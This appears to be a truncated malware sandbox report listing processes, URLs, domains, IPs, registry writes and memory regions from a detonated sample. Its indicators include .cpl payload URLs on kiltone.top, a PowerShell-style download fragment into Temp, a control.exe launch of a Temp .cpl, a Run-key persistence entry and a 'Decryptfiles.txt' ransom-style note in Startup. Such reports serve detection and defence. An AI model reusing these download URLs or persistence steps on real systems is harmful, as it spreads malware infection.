C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\control.exe
|
control C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\notepad.exe
|
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 40 hidden processes.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://kiltone.top/ste
|
unknown
|
||
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
|||
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
|
unknown
|
||
https://kiltone.top/stelin/Gosjeufon.cpl
|
45.125.67.168
|
||
https://kiltone.top/stelin/rwcla.cpl
|
45.125.67.168
|
||
https://www.oldmutual.co.za/v3/assets/blt0
|
unknown
|
||
https://kiltone.top/stelin/rwcla.
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://digify.com/a/#/access/login
|
unknown
|
||
https://www.ctrip.com/
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
|
unknown
|
||
https://account.bellmedia.c
|
unknown
|
||
https://weibo.com/
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
https://www.ifeng.com/
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
https://www.oldmutual.co.za/favicon.ico
|
18.161.69.16
|
||
https://www.reddit.com/
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
|
unknown
|
||
https://www.ebay.co.uk/
|
unknown
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|
|||
https://github.com/mozilla/webcompat-reporter
|
unknown
|
||
https://www.amazon.co.uk/
|
unknown
|
||
https://www.ebay.de/
|
unknown
|
||
https://screenshots.firefox.com/
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://www.google.com/search?client=firefox-b-d&q=
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
https://www.wykop.pl/
|
unknown
|
||
https://twitter.com/
|
unknown
|
||
https://digify.com/a/#/access/logincmd
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.olx.pl/
|
unknown
|
||
https://www.youtube.com/
|
unknown
|
||
https://allegro.pl/
|
unknown
|
||
https://support.mozilla.org/products/firefox
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
https://www.bbc.co.uk/
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
https://www.amazon.fr/
|
unknown
|
||
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
https://www.google.com/complete/
|
unknown
|
||
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
|
unknown
|
||
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
|
unknown
|
||
https://support.mozilla.org
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://www.iqiyi.com/
|
unknown
|
||
https://www.amazon.de/
|
unknown
|
||
https://www.baidu.com/
|
unknown
|
There are 48 hidden URLs.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
d12y248af9ueom.cloudfront.net
|
18.161.69.16
|
||
www.google.com
|
172.217.19.228
|
||
kiltone.top
|
45.125.67.168
|
||
www.oldmutual.co.za
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.217.19.228
|
www.google.com
|
United States
|
||
45.125.67.168
|
kiltone.top
|
Hong Kong
|
||
192.168.2.7
|
unknown
|
unknown
|
||
18.161.69.16
|
d12y248af9ueom.cloudfront.net
|
United States
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
XPSUDTARW
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
UID
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
Public
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
Private
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWindowsOnlyEOL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fPasteOriginalEOL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fReverse
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWrapAround
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fMatchCase
|
There are 30 hidden registries.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1998F437000
|
heap
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
26418546000
|
heap
|
page read and write
|
||
7FFB27C76000
|
unkown
|
page readonly
|
||
1998EC90000
|
heap
|
page read and write
|
||
1998EF7A000
|
heap
|
page read and write
|
||
2284442B000
|
heap
|
page read and write
|
||
1998F43E000
|
heap
|
page read and write
|
||
28A0000
|
heap
|
page read and write
|
||
22844B30000
|
heap
|
page read and write
|
||
142879C0000
|
trusted library section
|
page readonly
|
||
1428BF70000
|
remote allocation
|
page read and write
|
||
11E71BD6000
|
heap
|
page read and write
|
||
123D6707000
|
heap
|
page read and write
|
||
14286890000
|
heap
|
page read and write
|
||
35B5000
|
heap
|
page read and write
|
||
2740CCF8000
|
heap
|
page read and write
|
||
26418555000
|
heap
|
page read and write
|
||
D2D0000
|
trusted library allocation
|
page read and write
|
||
7FFB167B2000
|
unkown
|
page readonly
|
||
2284466B000
|
heap
|
page read and write
|
||
AABC000
|
heap
|
page read and write
|
||
2740CCD9000
|
heap
|
page read and write
|
||
14286F90000
|
trusted library section
|
page read and write
|
||
1428BEA0000
|
trusted library allocation
|
page read and write
|
||
1428C0BC000
|
heap
|
page read and write
|
||
14287015000
|
heap
|
page read and write
|
||
1998EC60000
|
trusted library allocation
|
page read and write
|
||
123D672A000
|
heap
|
page read and write
|
||
142879B0000
|
trusted library section
|
page readonly
|
||
BE7927F000
|
stack
|
page read and write
|
||
123D68B5000
|
heap
|
page read and write
|
||
27A55788000
|
heap
|
page read and write
|
||
36B0000
|
heap
|
page read and write
|
||
2284CAF5000
|
heap
|
page read and write
|
||
7FFB27C60000
|
unkown
|
page readonly
|
||
11E71BD9000
|
heap
|
page read and write
|
||
2284CAF6000
|
heap
|
page read and write
|
||
D3D459A000
|
stack
|
page read and write
|
||
1428BE29000
|
trusted library allocation
|
page read and write
|
||
2284CB00000
|
heap
|
page read and write
|
||
BE792FB000
|
stack
|
page read and write
|
||
2641853B000
|
heap
|
page read and write
|
||
12904FE000
|
unkown
|
page readonly
|
||
14287102000
|
heap
|
page read and write
|
||
123D68BA000
|
heap
|
page read and write
|
||
2284CB00000
|
heap
|
page read and write
|
||
D3D49FF000
|
stack
|
page read and write
|
||
3590000
|
heap
|
page read and write
|
||
1998EEE0000
|
heap
|
page read and write
|
||
1998F430000
|
heap
|
page read and write
|
||
79874FE000
|
stack
|
page read and write
|
||
2740CF05000
|
heap
|
page read and write
|
||
2740CCA9000
|
heap
|
page read and write
|
||
123D6731000
|
heap
|
page read and write
|
||
79AB3FE000
|
stack
|
page read and write
|
||
2021B9F0000
|
heap
|
page read and write
|
||
2021BB34000
|
heap
|
page read and write
|
||
1998EC10000
|
heap
|
page read and write
|
||
65B000
|
stack
|
page read and write
|
||
2284CAD3000
|
heap
|
page read and write
|
||
2284CB20000
|
heap
|
page read and write
|
||
142868AF000
|
heap
|
page read and write
|
||
BE791FE000
|
stack
|
page read and write
|
||
201017E000
|
stack
|
page read and write
|
||
27A556D0000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
123D68B7000
|
heap
|
page read and write
|
||
3450000
|
heap
|
page read and write
|
||
B4BC000
|
heap
|
page read and write
|
||
1428BE10000
|
trusted library allocation
|
page read and write
|
||
351E000
|
stack
|
page read and write
|
||
1998EC60000
|
trusted library allocation
|
page read and write
|
||
BD7000
|
heap
|
page read and write
|
||
2284CB28000
|
heap
|
page read and write
|
||
B37A000
|
heap
|
page read and write
|
||
915000
|
heap
|
page read and write
|
||
264184A0000
|
heap
|
page read and write
|
||
BD8D000
|
heap
|
page read and write
|
||
228445A0000
|
heap
|
page read and write
|
||
2284442B000
|
heap
|
page read and write
|
||
2284466A000
|
heap
|
page read and write
|
||
30FD000
|
stack
|
page read and write
|
||
11E71BA3000
|
heap
|
page read and write
|
||
11E71B7C000
|
heap
|
page read and write
|
||
1428C10A000
|
heap
|
page read and write
|
||
2284CAC9000
|
heap
|
page read and write
|
||
22844B3C000
|
heap
|
page read and write
|
||
8CE05FF000
|
stack
|
page read and write
|
||
2021DA70000
|
heap
|
page read and write
|
||
123D87F0000
|
heap
|
page read and write
|
||
2740CB50000
|
heap
|
page read and write
|
||
14286800000
|
heap
|
page read and write
|
||
7FFB226D0000
|
unkown
|
page read and write
|
||
CA6000
|
unkown
|
page write copy
|
||
11E71BD5000
|
heap
|
page read and write
|
||
1998ED3C000
|
heap
|
page read and write
|
||
14286902000
|
heap
|
page read and write
|
||
123D6744000
|
heap
|
page read and write
|
||
123D68B4000
|
heap
|
page read and write
|
||
1428BF70000
|
remote allocation
|
page read and write
|
||
228445C0000
|
trusted library allocation
|
page read and write
|
||
378F000
|
unkown
|
page read and write
|
||
C78D000
|
heap
|
page read and write
|
||
123D68BE000
|
heap
|
page read and write
|
||
2284466E000
|
heap
|
page read and write
|
||
33BF000
|
unkown
|
page read and write
|
||
22844409000
|
heap
|
page read and write
|
||
1428C090000
|
heap
|
page read and write
|
||
123D6690000
|
trusted library allocation
|
page read and write
|
||
7FFB226B0000
|
unkown
|
page readonly
|
||
7FFB167B5000
|
unkown
|
page readonly
|
||
7FFB27C85000
|
unkown
|
page readonly
|
||
27A55780000
|
heap
|
page read and write
|
||
200FC8A000
|
stack
|
page read and write
|
||
7AC837F000
|
stack
|
page read and write
|
||
2021BB11000
|
heap
|
page read and write
|
||
2740CDA0000
|
trusted library allocation
|
page read and write
|
||
22844407000
|
heap
|
page read and write
|
||
1998ED31000
|
heap
|
page read and write
|
||
2740EB20000
|
heap
|
page read and write
|
||
11E71BDF000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
22844430000
|
heap
|
page read and write
|
||
22844426000
|
heap
|
page read and write
|
||
12905FE000
|
unkown
|
page readonly
|
||
1428BDF0000
|
trusted library allocation
|
page read and write
|
||
11E71AC0000
|
heap
|
page read and write
|
||
123D6747000
|
heap
|
page read and write
|
||
22846560000
|
heap
|
page read and write
|
||
7FFB226D0000
|
unkown
|
page read and write
|
||
246926B0000
|
heap
|
page read and write
|
||
129047E000
|
stack
|
page read and write
|
||
123D68B2000
|
heap
|
page read and write
|
||
123D6690000
|
trusted library allocation
|
page read and write
|
||
22844660000
|
heap
|
page read and write
|
||
2641855A000
|
heap
|
page read and write
|
||
7987BFE000
|
stack
|
page read and write
|
||
2740D284000
|
heap
|
page read and write
|
||
26418C60000
|
heap
|
page read and write
|
||
7FFB167A6000
|
unkown
|
page readonly
|
||
ACAA000
|
heap
|
page read and write
|
||
2284CC4A000
|
heap
|
page read and write
|
||
11E71AD0000
|
heap
|
page read and write
|
||
22844B44000
|
heap
|
page read and write
|
||
2641853A000
|
heap
|
page read and write
|
||
123D6E02000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
228446A5000
|
heap
|
page read and write
|
||
1998EF70000
|
heap
|
page read and write
|
||
264186D0000
|
trusted library allocation
|
page read and write
|
||
2740CC93000
|
heap
|
page read and write
|
||
7AC7FCB000
|
stack
|
page read and write
|
||
34CE000
|
unkown
|
page read and write
|
||
11E71BE1000
|
heap
|
page read and write
|
||
123D6731000
|
heap
|
page read and write
|
||
1998ED31000
|
heap
|
page read and write
|
||
2D9D000
|
stack
|
page read and write
|
||
7FFB27C82000
|
unkown
|
page readonly
|
||
2284466A000
|
heap
|
page read and write
|
||
BEC9000
|
heap
|
page read and write
|
||
B4BC000
|
heap
|
page read and write
|
||
7FFB27C76000
|
unkown
|
page readonly
|
||
123D6960000
|
heap
|
page read and write
|
||
26418C5A000
|
heap
|
page read and write
|
||
128FE7E000
|
stack
|
page read and write
|
||
27A57660000
|
heap
|
page read and write
|
||
22844423000
|
heap
|
page read and write
|
||
1428711A000
|
heap
|
page read and write
|
||
26418C5E000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
2284CA80000
|
trusted library allocation
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
200FD0E000
|
stack
|
page read and write
|
||
22844663000
|
heap
|
page read and write
|
||
128FFFE000
|
unkown
|
page readonly
|
||
32B0000
|
heap
|
page read and write
|
||
7FFB27C82000
|
unkown
|
page readonly
|
||
7AC827E000
|
stack
|
page read and write
|
||
2740CF0A000
|
heap
|
page read and write
|
||
11E71B10000
|
heap
|
page read and write
|
||
228443E7000
|
heap
|
page read and write
|
||
BE78D8E000
|
stack
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
323D000
|
stack
|
page read and write
|
||
B6A0000
|
heap
|
page read and write
|
||
79875FE000
|
stack
|
page read and write
|
||
1428687D000
|
heap
|
page read and write
|
||
22844B42000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
1998ECF4000
|
heap
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
14286929000
|
heap
|
page read and write
|
||
A770000
|
trusted library allocation
|
page read and write
|
||
26418537000
|
heap
|
page read and write
|
||
79877FF000
|
stack
|
page read and write
|
||
14287000000
|
heap
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
1998ED19000
|
heap
|
page read and write
|
||
2740CC9B000
|
heap
|
page read and write
|
||
14287970000
|
trusted library section
|
page readonly
|
||
321E000
|
unkown
|
page read and write
|
||
AABC000
|
heap
|
page read and write
|
||
228443A0000
|
heap
|
page read and write
|
||
2740D270000
|
heap
|
page read and write
|
||
2284CAD2000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
123D68B3000
|
heap
|
page read and write
|
||
1428BEB0000
|
trusted library allocation
|
page read and write
|
||
1428BF30000
|
trusted library allocation
|
page read and write
|
||
2641853A000
|
heap
|
page read and write
|
||
28AC000
|
heap
|
page read and write
|
||
1998F43A000
|
heap
|
page read and write
|
||
1428C0C4000
|
heap
|
page read and write
|
||
26418C67000
|
heap
|
page read and write
|
||
2284CD0A000
|
heap
|
page read and write
|
||
C57814F000
|
stack
|
page read and write
|
||
333D000
|
stack
|
page read and write
|
||
1428BF20000
|
trusted library allocation
|
page read and write
|
||
123D6752000
|
heap
|
page read and write
|
||
2740CD01000
|
heap
|
page read and write
|
||
12909FC000
|
stack
|
page read and write
|
||
1998F454000
|
heap
|
page read and write
|
||
1428BF10000
|
trusted library allocation
|
page read and write
|
||
C9B919F000
|
stack
|
page read and write
|
||
2284CAD7000
|
heap
|
page read and write
|
||
14287100000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
B4B8000
|
heap
|
page read and write
|
||
22844415000
|
heap
|
page read and write
|
||
14287890000
|
trusted library allocation
|
page read and write
|
||
2740CCF1000
|
heap
|
page read and write
|
||
7FFB226C6000
|
unkown
|
page readonly
|
||
129067E000
|
stack
|
page read and write
|
||
26418C50000
|
heap
|
page read and write
|
||
C7B000
|
unkown
|
page readonly
|
||
2740CCE1000
|
heap
|
page read and write
|
||
123D6703000
|
heap
|
page read and write
|
||
A97E000
|
heap
|
page read and write
|
||
1290AFE000
|
unkown
|
page readonly
|
||
123D68BA000
|
heap
|
page read and write
|
||
1428BDD0000
|
trusted library allocation
|
page read and write
|
||
D3D497F000
|
stack
|
page read and write
|
||
ACA5000
|
heap
|
page read and write
|
||
228443D8000
|
heap
|
page read and write
|
||
12900FE000
|
unkown
|
page readonly
|
||
BF1000
|
unkown
|
page execute read
|
||
123D68BE000
|
heap
|
page read and write
|
||
425DFF000
|
stack
|
page read and write
|
||
2021BB31000
|
heap
|
page read and write
|
||
364F000
|
stack
|
page read and write
|
||
2800000
|
heap
|
page read and write
|
||
264184B0000
|
heap
|
page read and write
|
||
142879A0000
|
trusted library section
|
page readonly
|
||
2021BB09000
|
heap
|
page read and write
|
||
22844423000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
24692740000
|
heap
|
page read and write
|
||
2641A6D0000
|
heap
|
page read and write
|
||
2284CB00000
|
heap
|
page read and write
|
||
BEC0000
|
trusted library allocation
|
page read and write
|
||
26418C55000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
7FFB226B0000
|
unkown
|
page readonly
|
||
123D6690000
|
trusted library allocation
|
page read and write
|
||
1998F432000
|
heap
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
27A557F5000
|
heap
|
page read and write
|
||
1428C0FF000
|
heap
|
page read and write
|
||
2284CC43000
|
heap
|
page read and write
|
||
129007E000
|
stack
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
7FFB16791000
|
unkown
|
page execute read
|
||
123D6670000
|
heap
|
page read and write
|
||
1428BD40000
|
trusted library allocation
|
page read and write
|
||
2284CC44000
|
heap
|
page read and write
|
||
246926A0000
|
heap
|
page read and write
|
||
11E71BDF000
|
heap
|
page read and write
|
||
264184D0000
|
heap
|
page read and write
|
||
2740CCF3000
|
heap
|
page read and write
|
||
2021BC00000
|
heap
|
page read and write
|
||
11E71B64000
|
heap
|
page read and write
|
||
2740CCF6000
|
heap
|
page read and write
|
||
26418C52000
|
heap
|
page read and write
|
||
123D6731000
|
heap
|
page read and write
|
||
326E000
|
stack
|
page read and write
|
||
2740D27C000
|
heap
|
page read and write
|
||
11E71B7B000
|
heap
|
page read and write
|
||
26418536000
|
heap
|
page read and write
|
||
2284CD05000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
11E71B7F000
|
heap
|
page read and write
|
||
22844408000
|
heap
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
1998EF75000
|
heap
|
page read and write
|
||
2740CCF1000
|
heap
|
page read and write
|
||
2284466E000
|
heap
|
page read and write
|
||
22844B42000
|
heap
|
page read and write
|
||
2021BBAD000
|
heap
|
page read and write
|
||
7FFB226D5000
|
unkown
|
page readonly
|
||
11E71BD6000
|
heap
|
page read and write
|
||
2021D720000
|
heap
|
page read and write
|
||
1998F43A000
|
heap
|
page read and write
|
||
CA6000
|
unkown
|
page write copy
|
||
2740CCA0000
|
heap
|
page read and write
|
||
201007F000
|
stack
|
page read and write
|
||
228446A0000
|
heap
|
page read and write
|
||
1428C08D000
|
heap
|
page read and write
|
||
7FFB226D5000
|
unkown
|
page readonly
|
||
14286873000
|
heap
|
page read and write
|
||
2284CBC0000
|
heap
|
page read and write
|
||
2740CC30000
|
heap
|
page read and write
|
||
2021BB4A000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
2890000
|
heap
|
page read and write
|
||
2641853A000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
14286F80000
|
trusted library allocation
|
page read and write
|
||
7AC847F000
|
stack
|
page read and write
|
||
AAB5000
|
heap
|
page read and write
|
||
7FFB27C80000
|
unkown
|
page read and write
|
||
27A557F4000
|
heap
|
page read and write
|
||
123D6DF0000
|
heap
|
page read and write
|
||
123D696A000
|
heap
|
page read and write
|
||
22844414000
|
heap
|
page read and write
|
||
1428711B000
|
heap
|
page read and write
|
||
26418567000
|
heap
|
page read and write
|
||
2740CC70000
|
trusted library allocation
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
2284D197000
|
heap
|
page read and write
|
||
7987DFB000
|
stack
|
page read and write
|
||
2021BB6E000
|
heap
|
page read and write
|
||
123D66C0000
|
heap
|
page read and write
|
||
2284CC20000
|
heap
|
page read and write
|
||
1428C02C000
|
heap
|
page read and write
|
||
2284CA80000
|
trusted library allocation
|
page read and write
|
||
79AB4FF000
|
stack
|
page read and write
|
||
B370000
|
heap
|
page read and write
|
||
1428711A000
|
heap
|
page read and write
|
||
A971000
|
heap
|
page read and write
|
||
14287002000
|
heap
|
page read and write
|
||
22844662000
|
heap
|
page read and write
|
||
26418561000
|
heap
|
page read and write
|
||
1998ECE0000
|
heap
|
page read and write
|
||
1998F448000
|
heap
|
page read and write
|
||
14287D11000
|
trusted library allocation
|
page read and write
|
||
22844667000
|
heap
|
page read and write
|
||
228443E7000
|
heap
|
page read and write
|
||
24692748000
|
heap
|
page read and write
|
||
2740D282000
|
heap
|
page read and write
|
||
2021BB4A000
|
heap
|
page read and write
|
||
1428685B000
|
heap
|
page read and write
|
||
1998F43B000
|
heap
|
page read and write
|
||
1998F452000
|
heap
|
page read and write
|
||
35B0000
|
heap
|
page read and write
|
||
123D6DFC000
|
heap
|
page read and write
|
||
12902FA000
|
stack
|
page read and write
|
||
B6A5000
|
heap
|
page read and write
|
||
123D68BB000
|
heap
|
page read and write
|
||
11E71BE1000
|
heap
|
page read and write
|
||
2740CCE1000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
22844390000
|
heap
|
page read and write
|
||
2284CAFA000
|
heap
|
page read and write
|
||
7FFB226D2000
|
unkown
|
page readonly
|
||
1998F440000
|
heap
|
page read and write
|
||
C5780CB000
|
stack
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
1428BDB0000
|
trusted library allocation
|
page read and write
|
||
26418C5A000
|
heap
|
page read and write
|
||
123D6702000
|
heap
|
page read and write
|
||
2284D198000
|
heap
|
page read and write
|
||
1998EC20000
|
heap
|
page read and write
|
||
2641874A000
|
heap
|
page read and write
|
||
12901FE000
|
unkown
|
page readonly
|
||
2021BDA0000
|
heap
|
page read and write
|
||
BE790FD000
|
stack
|
page read and write
|
||
26418C74000
|
heap
|
page read and write
|
||
26418555000
|
heap
|
page read and write
|
||
11E71B7F000
|
heap
|
page read and write
|
||
142868A4000
|
heap
|
page read and write
|
||
123D68B7000
|
heap
|
page read and write
|
||
388F000
|
stack
|
page read and write
|
||
1428BE00000
|
trusted library allocation
|
page read and write
|
||
128FBFE000
|
unkown
|
page readonly
|
||
7FFB226D5000
|
unkown
|
page readonly
|
||
A530000
|
trusted library allocation
|
page read and write
|
||
C7B000
|
unkown
|
page readonly
|
||
264184F0000
|
trusted library allocation
|
page read and write
|
||
26418557000
|
heap
|
page read and write
|
||
7FFB226C6000
|
unkown
|
page readonly
|
||
D3D4A7F000
|
stack
|
page read and write
|
||
7AC83FE000
|
stack
|
page read and write
|
||
26418C72000
|
heap
|
page read and write
|
||
1998ED1C000
|
heap
|
page read and write
|
||
228443E2000
|
heap
|
page read and write
|
||
11E71B9B000
|
heap
|
page read and write
|
||
11E71B7E000
|
heap
|
page read and write
|
||
14287990000
|
trusted library section
|
page readonly
|
||
A979000
|
heap
|
page read and write
|
||
7FFB27C60000
|
unkown
|
